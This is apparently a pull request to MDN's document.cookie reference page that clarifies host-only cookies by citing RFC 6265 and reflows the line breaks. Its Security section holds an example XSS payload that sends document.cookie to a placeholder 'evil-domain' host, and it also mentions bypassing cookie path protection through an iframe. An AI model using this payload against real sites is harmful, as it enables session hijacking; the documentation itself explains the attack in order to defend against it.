### PR TITLE
Update index.md

### DIFF
--- a/files/en-us/web/api/document/cookie/index.md
+++ b/files/en-us/web/api/document/cookie/index.md
@@ -40,7 +40,9 @@ In the code above, `newCookie` is a string of form `key=value`, specifying the c
   pair, each preceded by a semicolon separator:
 
   - `;domain=domain` (e.g.,
-    '`example.com`' or '`subdomain.example.com`'): The host to which the cookie will be sent. If not specified, this defaults to the host portion of the current document location and the cookie is treated as [host-only](https://datatracker.ietf.org/doc/html/rfc6265#section-5.3) (i.e. subdomains are not included). Contrary to earlier specifications, leading dots in domain names are ignored, but browsers may decline to set the cookie containing such dots. If a domain is specified, subdomains are always included.
+    '`example.com`' or '`subdomain.example.com`'): The host to which the cookie will be sent. If not specified, this defaults to the host portion of the current document location and the cookie is not available on subdomains.
+     If a domain is specified, subdomains are always included.
+     Contrary to earlier specifications, leading dots in domain names are ignored, but browsers may decline to set the cookie containing such dots.
 
     > **Note:** The domain _must_ match
     > the domain of the JavaScript origin. Setting cookies to foreign

--- a/files/en-us/web/api/document/cookie/index.md
+++ b/files/en-us/web/api/document/cookie/index.md
@@ -40,7 +40,7 @@ In the code above, `newCookie` is a string of form `key=value`, specifying the c
   pair, each preceded by a semicolon separator:
 
   - `;domain=domain` (e.g.,
-    '`example.com`' or '`subdomain.example.com`'): The host to which the cookie will be sent. If not specified, this defaults to the host portion of the current document location. Contrary to earlier specifications, leading dots in domain names are ignored, but browsers may decline to set the cookie containing such dots. If a domain is specified, subdomains are always included.
+    '`example.com`' or '`subdomain.example.com`'): The host to which the cookie will be sent. If not specified, this defaults to the host portion of the current document location and the cookie is treated as [host-only](https://datatracker.ietf.org/doc/html/rfc6265#section-5.3) (i.e. subdomains are not included). Contrary to earlier specifications, leading dots in domain names are ignored, but browsers may decline to set the cookie containing such dots. If a domain is specified, subdomains are always included.
 
     > **Note:** The domain _must_ match
     > the domain of the JavaScript origin. Setting cookies to foreign

--- a/files/en-us/web/api/document/cookie/index.md
+++ b/files/en-us/web/api/document/cookie/index.md
@@ -8,10 +8,8 @@ browser-compat: api.Document.cookie
 
 {{APIRef("DOM")}}
 
-The {{domxref("Document")}} property `cookie` lets
-you read and write [cookies](/en-US/docs/Web/HTTP/Cookies) associated
-with the document. It serves as a getter and setter for the actual values of the
-cookies.
+The {{domxref("Document")}} property `cookie` lets you read and write [cookies](/en-US/docs/Web/HTTP/Cookies) associated with the document.
+It serves as a getter and setter for the actual values of the cookies.
 
 ## Syntax
 
@@ -21,12 +19,8 @@ cookies.
 allCookies = document.cookie;
 ```
 
-In the code above `allCookies` is a string containing a
-semicolon-separated list of all cookies (i.e.
-`key=value` pairs). Note that each _key_ and
-_value_ may be surrounded by whitespace (space and tab characters): in fact,
-{{RFC(6265)}} mandates a single space after each semicolon, but some user agents may
-not abide by this.
+In the code above `allCookies` is a string containing a semicolon-separated list of all cookies (i.e. `key=value` pairs).
+Note that each _key_ and _value_ may be surrounded by whitespace (space and tab characters): in fact, {{RFC(6265)}} mandates a single space after each semicolon, but some user agents may not abide by this.
 
 ### Write a new cookie
 
@@ -36,31 +30,24 @@ document.cookie = newCookie;
 
 In the code above, `newCookie` is a string of form `key=value`, specifying the cookie to set/update. Note that you can only set/update a single cookie at a time using this method. Consider also that:
 
-- Any of the following cookie attribute values can optionally follow the key-value
-  pair, each preceded by a semicolon separator:
+- Any of the following cookie attribute values can optionally follow the key-value pair, each preceded by a semicolon separator:
 
-  - `;domain=domain` (e.g.,
-    '`example.com`' or '`subdomain.example.com`'): The host to which the cookie will be sent. If not specified, this defaults to the host portion of the current document location and the cookie is not available on subdomains.
-     If a domain is specified, subdomains are always included.
-     Contrary to earlier specifications, leading dots in domain names are ignored, but browsers may decline to set the cookie containing such dots.
+  - `;domain=domain` (e.g., `example.com` or `subdomain.example.com`): The host to which the cookie will be sent.
+    If not specified, this defaults to the host portion of the current document location and the cookie is not available on subdomains.
+    If a domain is specified, subdomains are always included.
+    Contrary to earlier specifications, leading dots in domain names are ignored, but browsers may decline to set the cookie containing such dots.
 
-    > **Note:** The domain _must_ match
-    > the domain of the JavaScript origin. Setting cookies to foreign
-    > domains will be silently ignored.
+    > **Note:** The domain _must_ match the domain of the JavaScript origin.
+    > Setting cookies to foreign domains will be silently ignored.
 
   - `;expires=date-in-GMTString-format`: The expiry date of the cookie. If neither `expires` nor `max-age` is specified, it will expire at the end of session.
 
-    > **Warning:** When user privacy is a concern, it's important that any web app
-    > implementation invalidate cookie data after a certain timeout
-    > instead of relying on the browser to do it. Many browsers let
-    > users specify that cookies should never expire, which is not
-    > necessarily safe.
+    > **Warning:** When user privacy is a concern, it's important that any web app implementation invalidate cookie data after a certain timeout instead of relying on the browser to do it.
+    > Many browsers let users specify that cookies should never expire, which is not necessarily safe.
 
-    See {{jsxref("Date.toUTCString()")}} for help formatting this
-    value.
+    See {{jsxref("Date.toUTCString()")}} for help formatting this value.
 
-  - `;max-age=max-age-in-seconds`: The maximum age of the cookie in seconds (e.g.,
-    `60*60*24*365` or 31536000 for a year).
+  - `;max-age=max-age-in-seconds`: The maximum age of the cookie in seconds (e.g., `60*60*24*365` or 31536000 for a year).
 
   - `;partitioned`: Indicates that the cookie should be stored using partitioned storage. See [Cookies Having Independent Partitioned State (CHIPS)](/en-US/docs/Web/Privacy/Partitioned_cookies) for more details.
 
@@ -70,38 +57,27 @@ In the code above, `newCookie` is a string of form `key=value`, specifying the c
   - `;samesite`: [SameSite](/en-US/docs/Web/HTTP/Cookies#samesite_cookies) prevents the browser from sending this cookie along with cross-site
     requests. Possible values are `lax`, `strict` or `none`.
 
-    - The `lax` value will send the cookie for all same-site
-      requests and top-level navigation GET requests. This is sufficient
-      for user tracking, but it will prevent many [Cross-Site Request Forgery](/en-US/docs/Glossary/CSRF) (CSRF) attacks. This is
-      the default value in modern browsers.
-    - The `strict` value will prevent the cookie from being
-      sent by the browser to the target site in all cross-site browsing
-      contexts, even when following a regular link.
-    - The `none` value explicitly states no restrictions will
-      be applied. The cookie will be sent in all requests—both
-      cross-site and same-site.
+    - The `lax` value will send the cookie for all same-site requests and top-level navigation GET requests.
+      This is sufficient for user tracking, but it will prevent many [Cross-Site Request Forgery](/en-US/docs/Glossary/CSRF) (CSRF) attacks.
+      This is the default value in modern browsers.
+    - The `strict` value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing contexts, even when following a regular link.
+    - The `none` value explicitly states no restrictions will be applied.
+      The cookie will be sent in all requests—both cross-site and same-site.
 
   - `;secure`: Specifies that the cookie should only be transmitted over a secure protocol.
 
-- The cookie value string can use {{jsxref("Global_Objects/encodeURIComponent",
-  "encodeURIComponent()")}} to ensure that the string does not contain any commas,
-  semicolons, or whitespace (which are disallowed in cookie values).
+- The cookie value string can use {{jsxref("Global_Objects/encodeURIComponent", "encodeURIComponent()")}} to ensure that the string does not contain any commas, semicolons, or whitespace (which are disallowed in cookie values).
 - Some user agent implementations support the following cookie prefixes:
 
-  - `__Secure-` Signals to the browser that it should only include
-    the cookie in requests transmitted over a secure channel.
-  - `__Host-` Signals to the browser that in addition to the
-    restriction to only use the cookie from a secure origin, the scope of the
-    cookie is limited to a path attribute passed down by the server. If the
-    server omits the path attribute the "directory" of the request URI is
-    used. It also signals that the domain attribute must not be present, which
-    prevents the cookie from being sent to other domains. For Chrome the path
-    attribute must always be the origin.
+  - `__Secure-` Signals to the browser that it should only include the cookie in requests transmitted over a secure channel.
+  - `__Host-` Signals to the browser that in addition to the restriction to only use the cookie from a secure origin, the scope of the cookie is limited to a path attribute passed down by the server.
+    If the server omits the path attribute the "directory" of the request URI is used.
+    It also signals that the domain attribute must not be present, which prevents the cookie from being sent to other domains.
+    For Chrome the path attribute must always be the origin.
 
   > **Note:** The dash is considered part of the prefix.
 
-  > **Note:** These flags are only settable with the `secure`
-  > attribute.
+  > **Note:** These flags are only settable with the `secure` attribute.
 
 > **Note:** As you can see from the code above, `document.cookie` is an [accessor property](/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/defineProperty#description) with native _setter_ and _getter_ functions, and consequently is _not_ a [data property](/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/defineProperty#description) with a value: what you write is not the same as what you read, everything is always mediated by the JavaScript interpreter.
 
@@ -321,43 +297,32 @@ function clearASpecificValueOfTheCookie() {
 
 ## Security
 
-It is important to note that the `path` attribute does _not_ protect
-against unauthorized reading of the cookie from a different path. It can be easily
-bypassed using the DOM, for example by creating a hidden {{HTMLElement("iframe")}}
-element with the path of the cookie, then accessing this iframe's
-`contentDocument.cookie` property. The only way to protect the cookie is by
-using a different domain or subdomain, due to the [same origin policy](/en-US/docs/Web/Security/Same-origin_policy).
+It is important to note that the `path` attribute does _not_ protect against unauthorized reading of the cookie from a different path.
+It can be easily bypassed using the DOM, for example by creating a hidden {{HTMLElement("iframe")}} element with the path of the cookie, then accessing this iframe's `contentDocument.cookie` property.
+The only way to protect the cookie is by using a different domain or subdomain, due to the [same origin policy](/en-US/docs/Web/Security/Same-origin_policy).
 
-Cookies are often used in web applications to identify a user and their authenticated
-session. Stealing a cookie from a web application leads to hijacking the
-authenticated user's session. Common ways to steal cookies include using [social engineering](<https://en.wikipedia.org/wiki/Social_engineering_(security)>) or by exploiting a [cross-site scripting](/en-US/docs/Glossary/Cross-site_scripting) (XSS) vulnerability in the application -
+Cookies are often used in web applications to identify a user and their authenticated session.
+Stealing a cookie from a web application leads to hijacking the authenticated user's session.
+Common ways to steal cookies include using [social engineering](<https://en.wikipedia.org/wiki/Social_engineering_(security)>) or by exploiting a [cross-site scripting](/en-US/docs/Glossary/Cross-site_scripting) (XSS) vulnerability in the application -
 
 ```js
 new Image().src = `http://www.evil-domain.com/steal-cookie.php?cookie=${document.cookie}`;
 ```
 
-The `HTTPOnly` cookie attribute can help to mitigate this attack by
-preventing access to cookie value through JavaScript. Read more about [Cookies and Security](https://humanwhocodes.com/blog/2009/05/12/cookies-and-security/).
+The `HTTPOnly` cookie attribute can help to mitigate this attack by preventing access to cookie value through JavaScript.
+Read more about [Cookies and Security](https://humanwhocodes.com/blog/2009/05/12/cookies-and-security/).
 
 ## Notes
 
-- Starting with Firefox 2, a better mechanism for client-side storage is available -
-  [WHATWG DOM Storage](/en-US/docs/Web/API/Web_Storage_API).
+- Starting with Firefox 2, a better mechanism for client-side storage is available - [WHATWG DOM Storage](/en-US/docs/Web/API/Web_Storage_API).
 - You can delete a cookie by updating its expiration time to zero.
-- Keep in mind that the more cookies you have, the more data will be transferred
-  between the server and the client for each request. This will make each request
-  slower. It is highly recommended for you to use [WHATWG DOM Storage](/en-US/docs/Web/API/Web_Storage_API) if you are going to keep
-  "client-only" data.
-- [RFC 2965](https://www.ietf.org/rfc/rfc2965.txt) (Section 5.3,
-  "Implementation Limits") specifies that there should be **no maximum
-  length** of a cookie's key or value size, and encourages
-  implementations to support **arbitrarily large cookies**. Each
-  browser's implementation maximum will necessarily be different, so consult
-  individual browser documentation.
+- Keep in mind that the more cookies you have, the more data will be transferred between the server and the client for each request.
+  This will make each request slower.
+  It is highly recommended for you to use [WHATWG DOM Storage](/en-US/docs/Web/API/Web_Storage_API) if you are going to keep "client-only" data.
+- [RFC 2965](https://www.ietf.org/rfc/rfc2965.txt) (Section 5.3, "Implementation Limits") specifies that there should be **no maximum length** of a cookie's key or value size, and encourages implementations to support **arbitrarily large cookies**.
+  Each browser's implementation maximum will necessarily be different, so consult individual browser documentation.
 
-The reason for the [syntax](#syntax) of the `document.cookie`
-accessor property is due to the client-server nature of cookies, which differs from
-other client-client storage methods (like, for instance, [localStorage](/en-US/docs/Web/API/Web_Storage_API)):
+The reason for the [syntax](#syntax) of the `document.cookie` accessor property is due to the client-server nature of cookies, which differs from other client-client storage methods (like, for instance, [localStorage](/en-US/docs/Web/API/Web_Storage_API)):
 
 ### The server tells the client to store a cookie
 


### PR DESCRIPTION
### Description

Added an explanation regarding the host-only internal cookie flag.

Specifically, I am referring to  [RFC 6265](https://datatracker.ietf.org/doc/html/rfc6265#section-5.3) 5.3.6:

>         If the domain-attribute is non-empty:
> 
>            If the canonicalized request-host does not domain-match the
>            domain-attribute:
> 
>               Ignore the cookie entirely and abort these steps.
> 
>            Otherwise:
> 
>               Set the cookie's host-only-flag to false.
> 
>               Set the cookie's domain to the domain-attribute.
> 
>         Otherwise:
> 
>            Set the cookie's host-only-flag to true.
> 
>            Set the cookie's domain to the canonicalized request-host.
> 